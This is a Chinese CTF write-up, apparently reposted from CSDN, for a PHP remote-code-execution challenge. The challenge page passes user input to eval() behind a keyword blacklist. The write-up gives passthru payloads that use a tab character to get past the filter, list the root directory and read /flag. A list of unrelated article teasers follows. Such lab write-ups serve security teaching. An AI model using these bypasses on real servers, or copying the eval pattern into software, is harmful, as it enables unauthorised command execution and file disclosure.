polar CTF 简单rce

polar CTF 简单rce

news/2024/11/18 4:48:53/文章来源:https://blog.csdn.net/qq_36286161/article/details/135375064

一、题目

<?php
/*PolarD&N CTF*/
highlight_file(__FILE__);
function no($txt){if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){return $txt;}else{
die("what's up");}}
$yyds=($_POST['yyds']);
if(isset($_GET['sys'])&&$yyds=='666'){eval(no($_GET['sys']));}else{echo "nonono";
}
?> nonono

二、解题
1、知识

passthru() 只调用命令，把命令的运行结果原样地直接输出到标准输出设备上。（替换system）

payload

get
?sys=passthru('ls%09/');post
yyds=666

在这里插入图片描述
payload

get
?sys=passthru('sort%09/flag');post
yyds=666

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/593981.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

B端产品经理学习-B端产品系统调研的工具

B端产品经理学习-B端产品系统调研的工具

系统性调研目标的工具系统性调研的目标相对于背景调研，系统行调研是对公司可控因素（公司内部）和直接作用力（消费者、竞争者）进行的调研。系统性调研需要输出结论，为达成产品或公司的战略目标而制定行动的…

阅读更多...

【Java进阶篇】Java中Timer实现定时调度的原理（解析）

【Java进阶篇】Java中Timer实现定时调度的原理（解析）

Java中Timer实现定时调度的原理 ✔️ 引言✔️JDK 中Timer类的定义✔️拓展知识仓✔️优缺点 ✔️ 引言 Java中的Timer类是用于计划执行一项任务一次或重复固定延迟执行的简单工具。它使用一个名为TaskQueue的内部类来存储要执行的任务，这些任务被封装为TimerTask对…

阅读更多...

Python搭建代理IP池实现存储IP的方法

Python搭建代理IP池实现存储IP的方法

目录前言 1. 介绍 2. IP存储方法 2.1 存储到数据库 2.2 存储到文件 2.3 存储到内存 3. 完整代码示例总结前言代理IP池是一种常用的网络爬虫技术，可以用于反爬虫、批量访问目标网站等场景。本文介绍了使用Python搭建代理IP池，并实现IP存储的…

阅读更多...

三菱结构化While指令的使用

三菱结构化While指令的使用

最近在交流群中，有人就while指令使用错误进行了讨论，问题的总的原因是对While指令理解不到位导致，PLC看门狗报错！ 错误使用While指令导致看门狗报错下面就While指令的使用进行说明 WHILE语句。 WHILE语句执行时首先检测条件。…

阅读更多...

成为一名合格的前端架构师，前端知识技能与项目实战教学

成为一名合格的前端架构师，前端知识技能与项目实战教学

一、教程描述本套前端架构师教程，大小35.94G，共有672个文件。二、教程目录 01.node介绍和环境配置（共6课时） 02.ES6语法（共5课时） 03.node基础（共29课时） 04.Express框架&am…

阅读更多...

大语言模型LLM微调技术：P-Tuning

大语言模型LLM微调技术：P-Tuning

1 引言 Bert时代，我们常做预训练模型微调（Fine-tuning），即根据不同下游任务，引入各种辅助任务loss和垂直领域数据，将其添加到预训练模型中，以便让模型更加适配下游任务的方式。每个下游任务都存…

阅读更多...

Redis：原理速成+项目实战——Redis实战4（解决Redis缓存穿透、雪崩、击穿）

Redis：原理速成+项目实战——Redis实战4（解决Redis缓存穿透、雪崩、击穿）

👨‍🎓作者简介：一位大四、研0学生，正在努力准备大四暑假的实习 🌌上期文章：Redis：原理项目实战——Redis实战3（Redis缓存最佳实践（问题解析高级实现）&#x…

阅读更多...

计算器——可支持小数的任意四则运算（中缀表达式转为后缀表达式算法）

计算器——可支持小数的任意四则运算（中缀表达式转为后缀表达式算法）

中缀表达式转为后缀表达式的原理过程主要包括以下步骤： 1. 初始化两个栈，一个用于存储操作数，一个用于存储运算符。2. 从左到右扫描中缀表达式的每个字符。3. 如果遇到数字，则直接将其压入操作数栈。4. 如果遇到运算符&#xff0c…

阅读更多...

CSS 中间位置翻转动画

CSS 中间位置翻转动画

<template><div class"container" mouseenter"startAnimation" mouseleave"stopAnimation"><div class"box" :class"{ rotate-hor-center: isAnimating }">…

阅读更多...

msvcp140.dll丢失的错误解决办法，msvcp140.dll丢失的原因

msvcp140.dll丢失的错误解决办法，msvcp140.dll丢失的原因

如果你的电脑中正处于msvcp140.dll丢失或找不到msvcp140.dll的问题，那么可以尝试使用下面的方法进行解决msvcp140.dll丢失的问题。其实msvcp140.dll文件丢失的问题解决办法也很简单，但是出现msvcp140.dll丢失的问题却可能是有很多原因。接下来就给大家分…

阅读更多...

约束满足问题简介

约束满足问题简介

约束满足问题的定义约束满足问题（Constraint Satisfying Problem, CSP） – 由一个变量集合和一个约束集合定义； – 每个变量都有一个非空可能值域； – 每个约束指定了包含若干变量的一个子集内各变量的赋值范围。例如&…

阅读更多...

互联网加竞赛 Yolov安全帽佩戴检测危险区域进入检测 - 深度学习 opencv

互联网加竞赛 Yolov安全帽佩戴检测危险区域进入检测 - 深度学习 opencv

1 前言 🔥 优质竞赛项目系列，今天要分享的是 🚩 Yolov安全帽佩戴检测危险区域进入检测 🥇学长这里给一个题目综合评分(每项满分5分) 难度系数：3分工作量：3分创新点：4分该项目较为新颖&am…

阅读更多...

打造专业开发者指南：针对ShardingProxy分库分表解决策略的深度剖析 – 详解部署、使用、服务治理与优化技巧

打造专业开发者指南：针对ShardingProxy分库分表解决策略的深度剖析 – 详解部署、使用、服务治理与优化技巧

一、 ShardingProxy快速使用 ShardingProxy的功能同样是分库分表，但是他是一个独立部署的服务端，提供统一的数据库代理服务。注意，ShardingProxy目前只支持MySQL和PostgreSQL。并且，客户端连接ShardingProxy时，最好使…

阅读更多...

多模态大模型Vary：扩充视觉Vocabulary，实现更细粒度的视觉感知

多模态大模型Vary：扩充视觉Vocabulary，实现更细粒度的视觉感知

前言现代大型视觉语言模型(LVLMs)具有相同的视觉词汇- CLIP，它可以涵盖大多数常见的视觉任务。然而，对于一些需要密集和细粒度视觉感知的特殊视觉任务，例如文档级OCR或图表理解，特别是在非英语场景下，clip风格的词汇…

阅读更多...

Springboot集成RabbitMq二

Springboot集成RabbitMq二

接上一篇：Springboot集成RabbitMq一-CSDN博客 1、搭建项目-消费者与之前一样 2、创建配置类 package com.wym.rabbitmqconsumer.utils;import org.springframework.amqp.core.Binding; import org.springframework.amqp.core.BindingBuilder; import org.spring…

阅读更多...

JDK17 - 开发者视角，从 JDK8 ~ JDK17 都增加了哪些新特性

JDK17 - 开发者视角，从 JDK8 ~ JDK17 都增加了哪些新特性

目录前言一、站在开发视角，从 JDK8 升级到 JDK17 都有哪些新特性 1.1、JDK8 新特性 1.1.1、Optional 类 a）简介 b）使用方法 c）使用场景 1.2、JDK9 新特性 1.2.1、Optional - ifPresentOrElse 解决 if-else 1.2.2、Opt…

阅读更多...

Java程序设计阶段测试1

Java程序设计阶段测试1

一、单选题（共15题； 共30.0分） 2.0分 1、以下哪个是Java应用程序main方法的有效定义? A.public static void main(); B.public static void main( String args ); C.public static void main( String args[] ); D.public static boolea…

阅读更多...

Go Lang Fiber介绍

Go Lang Fiber介绍

利用GoLang Fiber进行高性能Web开发在不断发展的Web开发世界中，选择合适的框架至关重要。速度、简洁性和强大的功能集是每个开发者都追求的品质。在使用Go构建Web应用时，“Fiber”作为一个强大且轻量级的框架在众多选择中脱颖而出。在这份全面的指南中…

阅读更多...

扩展：键盘录入笔记(next()、nextLine()、nextInt()、nextDouble())

扩展：键盘录入笔记(next()、nextLine()、nextInt()、nextDouble())

文章目录一，键盘录入涉及到的方法如下：1）next（）、nextLine（）：代码示例：代码示例： 2）nextInt（）：代码示例&…

阅读更多...

无辅源电压继电器 RWY-D2/3 180-440VAC 导轨安装 josef约瑟

无辅源电压继电器 RWY-D2/3 180-440VAC 导轨安装 josef约瑟

RWY-D1型电压继电器； RWY-D2型电压继电器； 一、概述 RWY-D系列电压继电器（以下简称本继电器）用于发电机、变压器和输电线的电器保护装置中，作为过电压保护或低电压闭锁的启动原件。本继电器为集成电路静态型继电器…

阅读更多...

推荐文章

最新文章